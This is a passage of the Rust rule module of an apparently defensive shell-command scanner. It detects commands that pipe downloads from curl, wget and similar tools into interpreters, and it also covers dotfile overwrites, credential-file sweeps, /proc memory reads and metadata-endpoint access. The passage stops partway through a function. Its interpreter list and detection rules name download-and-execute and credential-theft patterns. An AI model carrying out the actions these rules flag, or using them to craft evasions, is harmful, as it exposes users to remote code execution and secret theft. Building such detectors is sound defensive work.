tirith_core/rules/
command.rs

1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::extract::ScanContext;
5use crate::redact;
6use crate::tokenize::{self, ShellType};
7use crate::verdict::{Evidence, Finding, RuleId, Severity};
8
9/// Canonical list of known interpreters (lowercase).
10/// Used by `is_interpreter()` and validated against tier-1 regex by drift test.
11pub const INTERPRETERS: &[&str] = &[
12    "sh",
13    "bash",
14    "zsh",
15    "dash",
16    "ksh",
17    "fish",
18    "csh",
19    "tcsh",
20    "ash",
21    "mksh",
22    "python",
23    "python2",
24    "python3",
25    "node",
26    "deno",
27    "bun",
28    "perl",
29    "ruby",
30    "php",
31    "lua",
32    "tclsh",
33    "elixir",
34    "rscript",
35    "pwsh",
36    "iex",
37    "invoke-expression",
38    "cmd",
39];
40
41/// Parse up to `max_digits` from `chars[*i..]` matching `predicate`, interpret as
42/// base-`radix`, and return the corresponding char. Advances `*i` past consumed digits.
43/// Zero heap allocations — uses a fixed stack buffer.
44fn parse_numeric_escape(
45    chars: &[char],
46    i: &mut usize,
47    max_digits: usize,
48    radix: u32,
49    predicate: fn(&char) -> bool,
50) -> Option<char> {
51    let mut buf = [0u8; 8];
52    let mut n = 0;
53    for _ in 0..max_digits {
54        if *i < chars.len() && predicate(&chars[*i]) {
55            buf[n] = chars[*i] as u8;
56            n += 1;
57            *i += 1;
58        } else {
59            break;
60        }
61    }
62    if n == 0 {
63        return None;
64    }
65    let s = std::str::from_utf8(&buf[..n]).ok()?;
66    let val = u32::from_str_radix(s, radix).ok()?;
67    char::from_u32(val)
68}
69
70/// Strip all shell quoting/escaping from a token, producing the effective string
71/// the shell would see after expansion.
72///
73/// Handles: single quotes, double quotes, ANSI-C quoting (`$'...'`), backslash
74/// escaping (POSIX) and backtick escaping (PowerShell).
75fn normalize_shell_token(input: &str, shell: ShellType) -> String {
76    #[derive(PartialEq)]
77    enum QState {
78        Normal,
79        Single,
80        Double,
81        AnsiC,
82    }
83
84    let chars: Vec<char> = input.chars().collect();
85    let len = chars.len();
86    let mut out = String::with_capacity(len);
87    let mut i = 0;
88    let is_ps = matches!(shell, ShellType::PowerShell);
89    let is_cmd = matches!(shell, ShellType::Cmd);
90    let mut state = QState::Normal;
91
92    while i < len {
93        match state {
94            QState::Normal => {
95                let ch = chars[i];
96                if is_cmd && ch == '^' && i + 1 < len {
97                    // Cmd caret escape: skip caret, take next char literal
98                    out.push(chars[i + 1]);
99                    i += 2;
100                } else if !is_ps && !is_cmd && ch == '\\' && i + 1 < len {
101                    // POSIX backslash escape: skip backslash, take next char literal
102                    out.push(chars[i + 1]);
103                    i += 2;
104                } else if is_ps && ch == '`' && i + 1 < len {
105                    // PowerShell backtick escape
106                    out.push(chars[i + 1]);
107                    i += 2;
108                } else if ch == '\'' && !is_cmd {
109                    state = QState::Single;
110                    i += 1;
111                } else if ch == '"' {
112                    state = QState::Double;
113                    i += 1;
114                } else if shell == ShellType::Posix
115                    && ch == '$'
116                    && i + 1 < len
117                    && chars[i + 1] == '\''
118                {
119                    state = QState::AnsiC;
120                    i += 2;
121                } else {
122                    out.push(ch);
123                    i += 1;
124                }
125            }
126            // SINGLE_QUOTE: everything literal until closing '
127            QState::Single => {
128                if chars[i] == '\'' {
129                    // PowerShell: '' inside single quotes is an escaped literal '
130                    if is_ps && i + 1 < len && chars[i + 1] == '\'' {
131                        out.push('\'');
132                        i += 2;
133                    } else {
134                        state = QState::Normal;
135                        i += 1;
136                    }
137                } else {
138                    out.push(chars[i]);
139                    i += 1;
140                }
141            }
142            // DOUBLE_QUOTE
143            QState::Double => {
144                if chars[i] == '"' {
145                    state = QState::Normal;
146                    i += 1;
147                } else if is_cmd && chars[i] == '^' && i + 1 < len {
148                    // Cmd caret escaping is still active inside double quotes.
149                    out.push(chars[i + 1]);
150                    i += 2;
151                } else if !is_ps && chars[i] == '\\' && i + 1 < len {
152                    // POSIX: only \", \\, \$, \` are special inside double quotes
153                    let next = chars[i + 1];
154                    if next == '"' || next == '\\' || next == '$' || next == '`' {
155                        out.push(next);
156                        i += 2;
157                    } else {
158                        // literal backslash
159                        out.push('\\');
160                        out.push(next);
161                        i += 2;
162                    }
163                } else if is_ps && chars[i] == '`' && i + 1 < len {
164                    // PowerShell backtick escape inside double quotes
165                    out.push(chars[i + 1]);
166                    i += 2;
167                } else {
168                    out.push(chars[i]);
169                    i += 1;
170                }
171            }
172            // ANSIC_QUOTE (POSIX only): decode escape sequences
173            QState::AnsiC => {
174                if chars[i] == '\'' {
175                    state = QState::Normal;
176                    i += 1;
177                } else if chars[i] == '\\' && i + 1 < len {
178                    let esc = chars[i + 1];
179                    match esc {
180                        'n' => {
181                            out.push('\n');
182                            i += 2;
183                        }
184                        't' => {
185                            out.push('\t');
186                            i += 2;
187                        }
188                        'r' => {
189                            out.push('\r');
190                            i += 2;
191                        }
192                        '\\' => {
193                            out.push('\\');
194                            i += 2;
195                        }
196                        '\'' => {
197                            out.push('\'');
198                            i += 2;
199                        }
200                        '"' => {
201                            out.push('"');
202                            i += 2;
203                        }
204                        'a' => {
205                            out.push('\x07');
206                            i += 2;
207                        }
208                        'b' => {
209                            out.push('\x08');
210                            i += 2;
211                        }
212                        'e' | 'E' => {
213                            out.push('\x1b');
214                            i += 2;
215                        }
216                        'f' => {
217                            out.push('\x0c');
218                            i += 2;
219                        }
220                        'v' => {
221                            out.push('\x0b');
222                            i += 2;
223                        }
224                        'x' => {
225                            // \xHH — 1 or 2 hex digits
226                            i += 2;
227                            if let Some(c) =
228                                parse_numeric_escape(&chars, &mut i, 2, 16, char::is_ascii_hexdigit)
229                            {
230                                out.push(c);
231                            }
232                        }
233                        'u' => {
234                            // \uHHHH — 1 to 4 hex digits
235                            i += 2;
236                            if let Some(c) =
237                                parse_numeric_escape(&chars, &mut i, 4, 16, char::is_ascii_hexdigit)
238                            {
239                                out.push(c);
240                            }
241                        }
242                        'U' => {
243                            // \UHHHHHHHH — 1 to 8 hex digits
244                            i += 2;
245                            if let Some(c) =
246                                parse_numeric_escape(&chars, &mut i, 8, 16, char::is_ascii_hexdigit)
247                            {
248                                out.push(c);
249                            }
250                        }
251                        c if c.is_ascii_digit() && c <= '7' => {
252                            // \NNN octal — 1 to 3 octal digits
253                            i += 1; // skip backslash
254                            if let Some(c) = parse_numeric_escape(&chars, &mut i, 3, 8, |c| {
255                                c.is_ascii_digit() && *c <= '7'
256                            }) {
257                                out.push(c);
258                            }
259                        }
260                        _ => {
261                            // Unknown escape: emit literal
262                            out.push('\\');
263                            out.push(esc);
264                            i += 2;
265                        }
266                    }
267                } else {
268                    out.push(chars[i]);
269                    i += 1;
270                }
271            }
272        }
273    }
274    out
275}
276
277/// Extract the effective command base name from a raw token.
278///
279/// Normalize → path basename → first word → lowercase → strip .exe
280fn normalize_cmd_base(raw: &str, shell: ShellType) -> String {
281    let normalized = normalize_shell_token(raw.trim(), shell);
282    basename_from_normalized(&normalized, shell)
283}
284
285/// Extract basename from an already-normalized (unquoted) string.
286/// Handles path separators, first-word extraction, lowercasing, and .exe stripping.
287fn basename_from_normalized(normalized: &str, shell: ShellType) -> String {
288    let has_path_sep = match shell {
289        ShellType::PowerShell | ShellType::Cmd => {
290            normalized.contains('/') || normalized.contains('\\')
291        }
292        _ => normalized.contains('/'),
293    };
294    let after_path = if has_path_sep {
295        match shell {
296            ShellType::PowerShell | ShellType::Cmd => {
297                normalized.rsplit(['/', '\\']).next().unwrap_or(normalized)
298            }
299            _ => normalized.rsplit('/').next().unwrap_or(normalized),
300        }
301    } else {
302        normalized
303    };
304    let first_word = after_path.split_whitespace().next().unwrap_or("");
305    let lower = first_word.to_lowercase();
306    if lower.ends_with(".exe") {
307        lower[..lower.len() - 4].to_string()
308    } else {
309        lower
310    }
311}
312
313fn is_interpreter(cmd: &str) -> bool {
314    INTERPRETERS.contains(&cmd)
315}
316
317/// Run command-shape rules.
318pub fn check(
319    input: &str,
320    shell: ShellType,
321    cwd: Option<&str>,
322    scan_context: ScanContext,
323) -> Vec<Finding> {
324    let mut findings = Vec::new();
325    let segments = tokenize::tokenize(input, shell);
326
327    // Check for pipe-to-interpreter patterns
328    let has_pipe = segments.iter().any(|s| {
329        s.preceding_separator.as_deref() == Some("|")
330            || s.preceding_separator.as_deref() == Some("|&")
331    });
332    if has_pipe {
333        check_pipe_to_interpreter(&segments, shell, &mut findings);
334    }
335
336    // Check for insecure TLS flags in source commands
337    for segment in &segments {
338        if let Some(ref cmd) = segment.command {
339            let cmd_base = normalize_cmd_base(cmd, shell);
340            if is_source_command(&cmd_base) {
341                let tls_findings =
342                    crate::rules::transport::check_insecure_flags(&segment.args, true);
343                findings.extend(tls_findings);
344            }
345        }
346    }
347
348    // Check for dotfile overwrites
349    check_dotfile_overwrite(&segments, &mut findings);
350
351    // Check for archive extraction to sensitive paths
352    check_archive_extract(&segments, &mut findings);
353
354    // Check for process memory access
355    check_proc_mem_access(&segments, shell, &mut findings);
356
357    // Check for Docker remote privilege escalation
358    check_docker_remote_privesc(&segments, shell, &mut findings);
359
360    // Check for credential file sweep (exec-only)
361    check_credential_file_sweep(&segments, shell, scan_context, &mut findings);
362
363    // Check for cargo install/add without supply-chain audit (exec-only)
364    if scan_context == ScanContext::Exec {
365        check_vet_not_configured(&segments, cwd, &mut findings);
366    }
367
368    // Check for dangerous environment variable exports
369    check_env_var_in_command(&segments, &mut findings);
370
371    // Check for network destination access (metadata endpoints, private networks)
372    check_network_destination(&segments, &mut findings);
373
374    findings
375}
376
377/// Resolve the effective interpreter from a segment, handling all quoting forms,
378/// wrappers (sudo, env, command, exec, nohup), subshells, and brace groups.
379fn resolve_interpreter_name(seg: &tokenize::Segment, shell: ShellType) -> Option<String> {
380    if let Some(ref cmd) = seg.command {
381        let cmd_base = normalize_cmd_base(cmd, shell);
382
383        // Direct interpreter
384        if is_interpreter(&cmd_base) {
385            return Some(cmd_base);
386        }
387
388        // Subshell: (bash) → strip parens, check
389        let stripped = cmd_base.trim_start_matches('(').trim_end_matches(')');
390        if stripped != cmd_base && is_interpreter(stripped) {
391            return Some(stripped.to_string());
392        }
393
394        // Brace group: { → first arg is command
395        if cmd_base == "{" {
396            return resolve_from_args(&seg.args, shell);
397        }
398
399        // Known wrappers
400        match cmd_base.as_str() {
401            "sudo" => return resolve_sudo_args(&seg.args, shell),
402            "env" => return resolve_env_args(&seg.args, shell),
403            "command" | "exec" | "nohup" => {
404                return resolve_wrapper_args(&seg.args, &cmd_base, shell);
405            }
406            _ => {}
407        }
408    }
409    None
410}
411
412/// Resolve the base command from a segment, stripping sudo/env/command/nohup/exec wrappers.
413/// Returns the normalized base command name (lowercase, .exe stripped).
414/// Unlike `resolve_interpreter_name`, this returns ANY command — not just interpreters.
415fn resolve_base_through_wrappers(seg: &tokenize::Segment, shell: ShellType) -> String {
416    let Some(ref cmd) = seg.command else {
417        return String::new();
418    };
419    let cmd_base = normalize_cmd_base(cmd, shell);
420
421    match cmd_base.as_str() {
422        "sudo" => resolve_base_sudo(&seg.args, shell).unwrap_or(cmd_base),
423        "env" => resolve_base_env(&seg.args, shell).unwrap_or(cmd_base),
424        "command" | "exec" | "nohup" => {
425            resolve_base_wrapper(&seg.args, &cmd_base, shell).unwrap_or(cmd_base)
426        }
427        _ => cmd_base,
428    }
429}
430
431/// Resolve base command through sudo wrapper.
432fn resolve_base_sudo(args: &[String], shell: ShellType) -> Option<String> {
433    let value_short_flags = ["-u", "-g", "-C", "-D", "-R", "-T"];
434    let value_long_flags = [
435        "--user",
436        "--group",
437        "--close-from",
438        "--chdir",
439        "--role",
440        "--type",
441        "--other-user",
442        "--host",
443        "--timeout",
444    ];
445    let mut idx = 0;
446    while idx < args.len() {
447        let normalized = normalize_shell_token(args[idx].trim(), shell);
448        if normalized == "--" {
449            // Next positional after -- is the command
450            if idx + 1 < args.len() {
451                return Some(normalize_cmd_base(&args[idx + 1], shell));
452            }
453            return None;
454        }
455        if normalized.starts_with("--") {
456            if value_long_flags.iter().any(|f| normalized == *f) {
457                idx += 2;
458            } else {
459                idx += 1;
460            }
461            continue;
462        }
463        if normalized.starts_with('-') {
464            if value_short_flags.iter().any(|f| normalized == *f)
465                || (normalized.len() > 2
466                    && value_short_flags
467                        .iter()
468                        .any(|f| normalized.ends_with(&f[1..])))
469            {
470                idx += 2;
471            } else {
472                idx += 1;
473            }
474            continue;
475        }
476        // First positional is the command — recurse for nested wrappers
477        let base = normalize_cmd_base(&args[idx], shell);
478        return match base.as_str() {
479            "sudo" => resolve_base_sudo(&args[idx + 1..], shell),
480            "env" => resolve_base_env(&args[idx + 1..], shell),
481            "command" | "exec" | "nohup" => resolve_base_wrapper(&args[idx + 1..], &base, shell),
482            _ => Some(base),
483        };
484    }
485    None
486}
487
488/// Resolve base command through env wrapper.
489fn resolve_base_env(args: &[String], shell: ShellType) -> Option<String> {
490    let value_short_flags = ["-u", "-C"];
491    let value_long_flags = [
492        "--unset",
493        "--chdir",
494        "--split-string",
495        "--block-signal",
496        "--default-signal",
497        "--ignore-signal",
498    ];
499    let mut idx = 0;
500    while idx < args.len() {
501        let normalized = normalize_shell_token(args[idx].trim(), shell);
502        if normalized == "--" {
503            if idx + 1 < args.len() {
504                return Some(normalize_cmd_base(&args[idx + 1], shell));
505            }
506            return None;
507        }
508        if normalized.starts_with("--") {
509            if normalized == "--split-string" {
510                if idx + 1 < args.len() {
511                    return resolve_base_from_command_string(&args[idx + 1], shell);
512                }
513                return None;
514            }
515            if let Some(val) = normalized.strip_prefix("--split-string=") {
516                return resolve_base_from_command_string(val, shell);
517            }
518            if value_long_flags.iter().any(|f| normalized == *f) {
519                idx += 2;
520            } else {
521                idx += 1;
522            }
523            continue;
524        }
525        if normalized == "-S" {
526            if idx + 1 < args.len() {
527                return resolve_base_from_command_string(&args[idx + 1], shell);
528            }
529            return None;
530        }
531        if normalized.starts_with('-') {
532            if value_short_flags.iter().any(|f| normalized == *f) {
533                idx += 2;
534            } else {
535                idx += 1;
536            }
537            continue;
538        }
539        // VAR=VALUE assignments
540        if normalized.contains('=') {
541            idx += 1;
542            continue;
543        }
544        // First positional is the command
545        let base = normalize_cmd_base(&args[idx], shell);
546        return match base.as_str() {
547            "sudo" => resolve_base_sudo(&args[idx + 1..], shell),
548            "env" => resolve_base_env(&args[idx + 1..], shell),
549            "command" | "exec" | "nohup" => resolve_base_wrapper(&args[idx + 1..], &base, shell),
550            _ => Some(base),
551        };
552    }
553    None
554}
555
556fn resolve_base_from_command_string(command: &str, shell: ShellType) -> Option<String> {
557    let normalized = normalize_shell_token(command.trim(), shell);
558    if normalized.is_empty() {
559        return None;
560    }
561
562    let segments = tokenize::tokenize(&normalized, shell);
563    let first = segments.first()?;
564    let base = resolve_base_through_wrappers(first, shell);
565    if base.is_empty() {
566        None
567    } else {
568        Some(base)
569    }
570}
571
572fn unwrap_env_split_string_segment(
573    seg: &tokenize::Segment,
574    shell: ShellType,
575) -> Option<tokenize::Segment> {
576    let command = seg.command.as_ref()?;
577    if normalize_cmd_base(command, shell) != "env" {
578        return None;
579    }
580
581    let value_short_flags = ["-u", "-C"];
582    let value_long_flags = [
583        "--unset",
584        "--chdir",
585        "--block-signal",
586        "--default-signal",
587        "--ignore-signal",
588    ];
589
590    let args = &seg.args;
591    let mut idx = 0;
592    while idx < args.len() {
593        let normalized = normalize_shell_token(args[idx].trim(), shell);
594        if normalized == "--split-string" || normalized == "-S" {
595            let command = args.get(idx + 1)?;
596            let normalized_command = normalize_shell_token(command.trim(), shell);
597            return tokenize::tokenize(&normalized_command, shell)
598                .into_iter()
599                .next();
600        }
601        if let Some(val) = normalized.strip_prefix("--split-string=") {
602            let normalized_command = normalize_shell_token(val.trim(), shell);
603            return tokenize::tokenize(&normalized_command, shell)
604                .into_iter()
605                .next();
606        }
607        if normalized == "--" {
608            return None;
609        }
610        if normalized.starts_with("--") {
611            if value_long_flags.iter().any(|f| normalized == *f) {
612                idx += 2;
613            } else {
614                idx += 1;
615            }
616            continue;
617        }
618        if normalized.starts_with('-') {
619            if value_short_flags.iter().any(|f| normalized == *f) {
620                idx += 2;
621            } else {
622                idx += 1;
623            }
624            continue;
625        }
626        if normalized.contains('=') {
627            idx += 1;
628            continue;
629        }
630        return None;
631    }
632    None
633}
634
635/// Resolve base command through command/exec/nohup wrappers.
636fn resolve_base_wrapper(args: &[String], wrapper: &str, shell: ShellType) -> Option<String> {
637    let value_flags: &[&str] = match wrapper {
638        "exec" => &["-a"],
639        _ => &[],
640    };
641    let mut idx = 0;
642    while idx < args.len() {
643        let normalized = normalize_shell_token(args[idx].trim(), shell);
644        if normalized == "--" {
645            if idx + 1 < args.len() {
646                return Some(normalize_cmd_base(&args[idx + 1], shell));
647            }
648            return None;
649        }
650        if normalized.starts_with("--") || normalized.starts_with('-') {
651            if value_flags.iter().any(|f| normalized == *f) {
652                idx += 2;
653            } else {
654                idx += 1;
655            }
656            continue;
657        }
658        let base = normalize_cmd_base(&args[idx], shell);
659        return match base.as_str() {
660            "sudo" => resolve_base_sudo(&args[idx + 1..], shell),
661            "env" => resolve_base_env(&args[idx + 1..], shell),
662            "command" | "exec" | "nohup" => resolve_base_wrapper(&args[idx + 1..], &base, shell),
663            _ => Some(base),
664        };
665    }
666    None
667}
668
669#[derive(Clone, Copy)]
670enum ResolverParser {
671    Generic,
672    Sudo,
673    Env,
674    Command,
675    Exec,
676    Nohup,
677}
678
679enum ResolveStep<'a> {
680    Found(String),
681    Next {
682        parser: ResolverParser,
683        args: &'a [String],
684        inspected: usize,
685    },
686    Stop,
687}
688
689/// Resolve interpreter from a generic arg list. Uses an iterative parser with a
690/// token-inspection budget so deeply nested wrappers cannot bypass detection.
691fn resolve_from_args(args: &[String], shell: ShellType) -> Option<String> {
692    resolve_with_parser(args, shell, ResolverParser::Generic)
693}
694
695fn resolve_sudo_args(args: &[String], shell: ShellType) -> Option<String> {
696    resolve_with_parser(args, shell, ResolverParser::Sudo)
697}
698
699fn resolve_env_args(args: &[String], shell: ShellType) -> Option<String> {
700    resolve_with_parser(args, shell, ResolverParser::Env)
701}
702
703fn resolve_wrapper_args(args: &[String], wrapper: &str, shell: ShellType) -> Option<String> {
704    let parser = match wrapper {
705        "command" => ResolverParser::Command,
706        "exec" => ResolverParser::Exec,
707        "nohup" => ResolverParser::Nohup,
708        _ => ResolverParser::Command,
709    };
710    resolve_with_parser(args, shell, parser)
711}
712
713fn resolve_with_parser(
714    args: &[String],
715    shell: ShellType,
716    start_parser: ResolverParser,
717) -> Option<String> {
718    if args.is_empty() {
719        return None;
720    }
721
722    let mut parser = start_parser;
723    let mut current = args;
724    // Budget scales with input size and keeps resolution bounded even on adversarial inputs.
725    let mut budget = args.len().saturating_mul(4).saturating_add(8);
726
727    while budget > 0 && !current.is_empty() {
728        let step = match parser {
729            ResolverParser::Generic => resolve_step_generic(current, shell),
730            ResolverParser::Sudo => resolve_step_sudo(current, shell),
731            ResolverParser::Env => resolve_step_env(current, shell),
732            ResolverParser::Command => resolve_step_wrapper(current, shell, "command"),
733            ResolverParser::Exec => resolve_step_wrapper(current, shell, "exec"),
734            ResolverParser::Nohup => resolve_step_wrapper(current, shell, "nohup"),
735        };
736
737        match step {
738            ResolveStep::Found(interpreter) => return Some(interpreter),
739            ResolveStep::Stop => return None,
740            ResolveStep::Next {
741                parser: next_parser,
742                args: next_args,
743                inspected,
744            } => {
745                parser = next_parser;
746                current = next_args;
747                budget = budget.saturating_sub(inspected.max(1));
748            }
749        }
750    }
751    None
752}
753
754fn resolve_step_generic<'a>(args: &'a [String], shell: ShellType) -> ResolveStep<'a> {
755    let mut idx = 0;
756    let mut seen_dashdash = false;
757    while idx < args.len() {
758        let raw = args[idx].trim();
759        let normalized = normalize_shell_token(raw, shell);
760
761        // Track end-of-options marker
762        if normalized == "--" {
763            seen_dashdash = true;
764            idx += 1;
765            continue;
766        }
767
768        // Skip flags and assignments (only before --)
769        if !seen_dashdash
770            && (normalized.starts_with("--")
771                || normalized.starts_with('-')
772                || normalized.contains('='))
773        {
774            idx += 1;
775            continue;
776        }
777
778        let base = basename_from_normalized(&normalized, shell);
779        return match base.as_str() {
780            "sudo" => ResolveStep::Next {
781                parser: ResolverParser::Sudo,
782                args: &args[idx + 1..],
783                inspected: idx + 1,
784            },
785            "env" => ResolveStep::Next {
786                parser: ResolverParser::Env,
787                args: &args[idx + 1..],
788                inspected: idx + 1,
789            },
790            "command" => ResolveStep::Next {
791                parser: ResolverParser::Command,
792                args: &args[idx + 1..],
793                inspected: idx + 1,
794            },
795            "exec" => ResolveStep::Next {
796                parser: ResolverParser::Exec,
797                args: &args[idx + 1..],
798                inspected: idx + 1,
799            },
800            "nohup" => ResolveStep::Next {
801                parser: ResolverParser::Nohup,
802                args: &args[idx + 1..],
803                inspected: idx + 1,
804            },
805            _ if is_interpreter(&base) => ResolveStep::Found(base),
806            _ => ResolveStep::Stop,
807        };
808    }
809    ResolveStep::Stop
810}
811
812fn resolve_step_sudo<'a>(args: &'a [String], shell: ShellType) -> ResolveStep<'a> {
813    let value_short_flags = ["-u", "-g", "-C", "-D", "-R", "-T"];
814    let value_long_flags = [
815        "--user",
816        "--group",
817        "--close-from",
818        "--chdir",
819        "--role",
820        "--type",
821        "--other-user",
822        "--host",
823        "--timeout",
824    ];
825
826    let mut idx = 0;
827    while idx < args.len() {
828        let raw = args[idx].trim();
829        let normalized = normalize_shell_token(raw, shell);
830        // -- ends option parsing; remaining args are the command
831        if normalized == "--" {
832            return ResolveStep::Next {
833                parser: ResolverParser::Generic,
834                args: &args[(idx + 1).min(args.len())..],
835                inspected: idx + 1,
836            };
837        }
838        if normalized.starts_with("--") {
839            if value_long_flags.iter().any(|f| normalized == *f) {
840                idx += 2;
841                continue;
842            }
843            if let Some((key, _)) = normalized.split_once('=') {
844                if value_long_flags.contains(&key) {
845                    idx += 1;
846                    continue;
847                }
848            }
849            // Unknown long flag: treat as boolean.
850            idx += 1;
851            continue;
852        }
853        if normalized.starts_with('-') {
854            if value_short_flags.iter().any(|f| normalized == *f) {
855                // Exact match: e.g. -u → next arg is the value
856                idx += 2;
857            } else if normalized.len() > 2
858                && value_short_flags.iter().any(|f| {
859                    normalized.ends_with(&f[1..]) // last char matches value-flag letter
860                })
861            {
862                // Combined short flags: e.g. -iu → -i + -u, last flag takes a value
863                idx += 2;
864            } else {
865                idx += 1;
866            }
867            continue;
868        }
869        return ResolveStep::Next {
870            parser: ResolverParser::Generic,
871            args: &args[idx..],
872            inspected: idx + 1,
873        };
874    }
875    ResolveStep::Stop
876}
877
878fn resolve_step_env<'a>(args: &'a [String], shell: ShellType) -> ResolveStep<'a> {
879    let value_short_flags = ["-u", "-C"];
880    let value_long_flags = [
881        "--unset",
882        "--chdir",
883        "--split-string",
884        "--block-signal",
885        "--default-signal",
886        "--ignore-signal",
887    ];
888
889    let mut idx = 0;
890    while idx < args.len() {
891        let raw = args[idx].trim();
892        let normalized = normalize_shell_token(raw, shell);
893        // -- ends option parsing; remaining args are the command
894        if normalized == "--" {
895            return ResolveStep::Next {
896                parser: ResolverParser::Generic,
897                args: &args[(idx + 1).min(args.len())..],
898                inspected: idx + 1,
899            };
900        }
901        if normalized.starts_with("--") {
902            // --split-string: value is a command string.
903            if normalized == "--split-string" {
904                if idx + 1 < args.len() {
905                    let base = normalize_cmd_base(&args[idx + 1], shell);
906                    if is_interpreter(&base) {
907                        return ResolveStep::Found(base);
908                    }
909                }
910                idx += 2;
911                continue;
912            }
913            if let Some(val) = normalized.strip_prefix("--split-string=") {
914                let base = normalize_cmd_base(val, shell);
915                if is_interpreter(&base) {
916                    return ResolveStep::Found(base);
917                }
918                idx += 1;
919                continue;
920            }
921            if value_long_flags.iter().any(|f| normalized == *f) {
922                idx += 2;
923                continue;
924            }
925            if let Some((key, _)) = normalized.split_once('=') {
926                if value_long_flags.contains(&key) {
927                    idx += 1;
928                    continue;
929                }
930            }
931            // Unknown long flag: treat as boolean.
932            idx += 1;
933            continue;
934        }
935        if normalized == "-S" {
936            // -S: value is a command string.
937            if idx + 1 < args.len() {
938                let base = normalize_cmd_base(&args[idx + 1], shell);
939                if is_interpreter(&base) {
940                    return ResolveStep::Found(base);
941                }
942            }
943            idx += 2;
944            continue;
945        }
946        if normalized.starts_with('-') {
947            if value_short_flags.iter().any(|f| normalized == *f) {
948                idx += 2;
949            } else {
950                idx += 1;
951            }
952            continue;
953        }
954        if normalized.contains('=') {
955            idx += 1;
956            continue;
957        }
958        return ResolveStep::Next {
959            parser: ResolverParser::Generic,
960            args: &args[idx..],
961            inspected: idx + 1,
962        };
963    }
964    ResolveStep::Stop
965}
966
967fn resolve_step_wrapper<'a>(
968    args: &'a [String],
969    shell: ShellType,
970    wrapper: &str,
971) -> ResolveStep<'a> {
972    let value_flags: &[&str] = match wrapper {
973        "exec" => &["-a"],
974        _ => &[],
975    };
976
977    let mut idx = 0;
978    while idx < args.len() {
979        let raw = args[idx].trim();
980        let normalized = normalize_shell_token(raw, shell);
981        // -- ends option parsing; remaining args are the command
982        if normalized == "--" {
983            return ResolveStep::Next {
984                parser: ResolverParser::Generic,
985                args: &args[(idx + 1).min(args.len())..],
986                inspected: idx + 1,
987            };
988        }
989        if normalized.starts_with("--") || normalized.starts_with('-') {
990            if value_flags.iter().any(|f| normalized == *f) {
991                idx += 2;
992            } else {
993                idx += 1;
994            }
995            continue;
996        }
997        return ResolveStep::Next {
998            parser: ResolverParser::Generic,
999            args: &args[idx..],
1000            inspected: idx + 1,
1001        };
1002    }
1003    ResolveStep::Stop
1004}
1005
1006fn check_pipe_to_interpreter(
1007    segments: &[tokenize::Segment],
1008    shell: ShellType,
1009    findings: &mut Vec<Finding>,
1010) {
1011    for (i, seg) in segments.iter().enumerate() {
1012        if i == 0 {
1013            continue;
1014        }
1015        if let Some(sep) = &seg.preceding_separator {
1016            if sep == "|" || sep == "|&" {
1017                if let Some(interpreter) = resolve_interpreter_name(seg, shell) {
1018                    // i > 0 is guaranteed — the loop skips i == 0 above.
1019                    let source = &segments[i - 1];
1020                    let source_cmd_ref = source.command.as_deref().unwrap_or("unknown");
1021                    let source_base = normalize_cmd_base(source_cmd_ref, shell);
1022                    let source_is_tirith_run = source_base == "tirith"
1023                        && source
1024                            .args
1025                            .first()
1026                            .map(|arg| normalize_cmd_base(arg, shell) == "run")
1027                            .unwrap_or(false);
1028                    let source_label = if source_is_tirith_run {
1029                        "tirith run".to_string()
1030                    } else {
1031                        source_base.clone()
1032                    };
1033
1034                    // Skip if the source is tirith itself — its output is trusted.
1035                    if source_base == "tirith" && !source_is_tirith_run {
1036                        continue;
1037                    }
1038
1039                    let rule_id = match source_base.as_str() {
1040                        "curl" => RuleId::CurlPipeShell,
1041                        "wget" => RuleId::WgetPipeShell,
1042                        "http" | "https" => RuleId::HttpiePipeShell,
1043                        "xh" => RuleId::XhPipeShell,
1044                        _ => RuleId::PipeToInterpreter,
1045                    };
1046
1047                    let display_cmd = seg.command.as_deref().unwrap_or(&interpreter);
1048
1049                    let base_desc = format!(
1050                        "Command pipes output from '{source_label}' directly to \
1051                         interpreter '{interpreter}'. Downloaded content will be \
1052                         executed without inspection."
1053                    );
1054
1055                    let description = if is_url_fetch_command(&source_base) {
1056                        let show_tirith_run = cfg!(unix)
1057                            && supports_tirith_run_hint(&source_base)
1058                            && shell != ShellType::PowerShell;
1059                        if let Some(url) = extract_urls_from_args(&source.args, shell)
1060                            .into_iter()
1061                            .next()
1062                            .map(|u| sanitize_url_for_display(&u))
1063                        {
1064                            if show_tirith_run {
1065                                format!(
1066                                    "{base_desc}\n  Safer: tirith run {url}  \
1067                                     \u{2014} or: vet {url}  (https://getvet.sh)"
1068                                )
1069                            } else {
1070                                format!(
1071                                    "{base_desc}\n  Safer: vet {url}  \
1072                                     (https://getvet.sh)"
1073                                )
1074                            }
1075                        } else if show_tirith_run {
1076                            format!(
1077                                "{base_desc}\n  Safer: use 'tirith run <url>' \
1078                                 or 'vet <url>' (https://getvet.sh) to inspect \
1079                                 before executing."
1080                            )
1081                        } else {
1082                            format!(
1083                                "{base_desc}\n  Safer: use 'vet <url>' \
1084                                 (https://getvet.sh) to inspect before executing."
1085                            )
1086                        }
1087                    } else {
1088                        base_desc
1089                    };
1090
1091                    let mut evidence = vec![Evidence::CommandPattern {
1092                        pattern: "pipe to interpreter".to_string(),
1093                        matched: redact::redact_shell_assignments(&format!(
1094                            "{} | {}",
1095                            source.raw, seg.raw
1096                        )),
1097                    }];
1098                    for url in extract_urls_from_args(&source.args, shell) {
1099                        evidence.push(Evidence::Url { raw: url });
1100                    }
1101
1102                    findings.push(Finding {
1103                        rule_id,
1104                        severity: Severity::High,
1105                        title: format!("Pipe to interpreter: {source_cmd_ref} | {display_cmd}"),
1106                        description,
1107                        evidence,
1108                        human_view: None,
1109                        agent_view: None,
1110                        mitre_id: None,
1111                        custom_rule_id: None,
1112                    });
1113                }
1114            }
1115        }
1116    }
1117}
1118
1119fn check_dotfile_overwrite(segments: &[tokenize::Segment], findings: &mut Vec<Finding>) {
1120    for segment in segments {
1121        // Check for redirects to dotfiles
1122        let raw = &segment.raw;
1123        if (raw.contains("> ~/.")
1124            || raw.contains("> $HOME/.")
1125            || raw.contains(">> ~/.")
1126            || raw.contains(">> $HOME/."))
1127            && !raw.contains("> /dev/null")
1128        {
1129            findings.push(Finding {
1130                rule_id: RuleId::DotfileOverwrite,
1131                severity: Severity::High,
1132                title: "Dotfile overwrite detected".to_string(),
1133                description: "Command redirects output to a dotfile in the home directory, which could overwrite shell configuration".to_string(),
1134                evidence: vec![Evidence::CommandPattern {
1135                    pattern: "redirect to dotfile".to_string(),
1136                    matched: redact::redact_shell_assignments(raw),
1137                }],
1138                human_view: None,
1139                agent_view: None,
